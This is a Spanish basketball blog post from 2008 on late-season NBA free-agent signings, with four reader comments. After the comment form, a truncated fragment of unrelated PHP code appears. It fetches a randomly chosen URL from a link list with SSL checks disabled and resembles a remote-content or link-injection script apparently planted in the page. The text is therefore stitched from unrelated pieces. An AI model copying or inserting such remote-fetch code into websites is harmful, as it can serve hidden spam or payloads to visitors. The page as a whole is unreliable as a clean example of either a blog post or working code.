Crónica de varios fichajes anunciados.

05 de March de 2008 por Gallis

Tal y como anunciamos el pasado viernes, el movimiento de jugadores cortados por sus equipos ha sido casi tan intenso como el pasado mes de febrero en cuestión de traspasos. Varios de los equipos que optan a todo en esta próxima postseason han completado sus plantillas a última hora con veteranos en busca del anillo o con jugadores que llegan para dar un hombre más en la rotación.

Quizá el fichaje más esperado sea el de Sam Cassell por los Boston Celtics. El base llega a Boston para compartir minutos con Rajon Rondo, una de las sorpresas de la temporada. Cassell se encuentra, en su décimoquinta temporada, con la oportunidad de volver a ganar un anillo 13 años después de que lo consiguiera con Houston Rockets(1994 y 1995). En los 38 partidos que ha jugado con los Clippers esta temporada, el veterano base promedia 12.8 puntos y 4.7 asistencias. Su experiencia en Playoffs (ha jugado 115 partidos) puede ser de vital importancia. Este es el segundo veterano que firma con los de Doc Rivers en estos últimos días, tras firmar a PJ Brown. Todavía no hay fecha para el debut de ninguno de los 2 jugadores.

El principal rival de Boston en el este, los Detroit Pistons, también se han reforzado. Theo Ratliff, cortado hace unos días por los Minnesotta Timberwolves, ha firmado hasta final de temporada por el equipo de Michigan para reforzar su juego interior. De esta forma, Ratliff regresa al equipo que le escogió en el draft hace 13 temporadas. Otro fichaje que ya se ha confirmado es el de Gordan Giricek por los Phoenix Suns. El escolta croata se convierte así en un nuevo refuerzo para el equipo de Mike D´Antoni, algo escaso en rotación exterior. El General Manager de los Suns, Steve Kerr, ha calificado a Giricek como “un excelente tirador, un sólido defensor y un hombre con experiencia en Playoff.

Y mientras pasan los 30 días necesarios para que se confirme el fichaje de Brent Barry por los Spurs, otras sorpresas se confirmaron anoche. Tyronne Lue, tras ser cortado por los Kings, ha deshojado la margarita. Dallas Mavericks es el equipo elegido por el jugador, que también era pretendido por Denver Nuggetts. su misión está clara: dar minutos de descanso a Jason Kidd. Otro grande del oeste también planea reforzarse en los próximos días y el nombre es toda una sorpresa. Y es que New Orleans Hornets ha anunciado su intención de firmar en los próximos días a Chris Andersen, tas cumplirse los 2 años de sanción que el pivot ha cumplido por consumo de drogas. Conocido como el hombre pajaro, Andersen firmará hasta final de temporada, tras haber pasado test antidroga semanalmente en los últimos 12 meses y test antialcohol en los últimos 6. Hace 2 años, cuando fue suspendido, el 27 de enero de 2006, Andersen estaba en el primero de sus 4 años de contrato con los Hornets, por el que iba a recibir 14 millones de dólares. en ese momento, promediaba 5 puntos y 4.8 rebotes por partido.

 

En otro orden de cosas, pese a su pésimo récord(11-46, el peor de la NBA), Miami Heat continúa siendo uno de los equipo más atractivos de la NBA. Prueba de ello es el anuncio que va a hacer la liga en los próximos días. Y es que los pupilos de Riley son el equipo elegido para hacer un tour por Europa la próxima pretemporada. Wade y compañia disputarán sendos partidos de exhibición en París y Londres.

Comenta

4 comentarios a esta entrada

  1. txusma dice:
    #1

    😀 Wade y compañia!! Puede ser que esta compañía sea patética ciertamente, pero patética

    Por lo que respecta a los movimientos me gustan mucho los de los Celtics que creo q los hace aun mas favoritos. Cassell y Brown son toda una garantía, la verdad.

      Citar

  2. Gallis dice:
    #2

    Ya te digo, jeje, aunque me da a mí que en esta próxima pretemporada Miami va a dar uno o dos pelotazos bastante serios.

    En cuanto a los refuerzos, Barry aparte, coincido en que los Celtics se han movido bien. EL único movimiento que realmente no me gusta es el de Giricek. A ver como acaba cuajando, pero sigue sin gustarme como se está moviendo Phoenix.

      Citar

  3. Jabho dice:
    #3

    Cierto, gran movimiento de los Celtics que consiguen dos refuerzos donde mas los necesitaban: un base capaz de dirigir y un jugador interior capaz de defender…a ver como llegan a PO

      Citar

  4. Olafur dice:
    #4

    Pues cada vez mas huele la cosa a las míticas finales Celtics- Lakers de los 80, a poco de que Cassel y Pj se pongan a tono

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>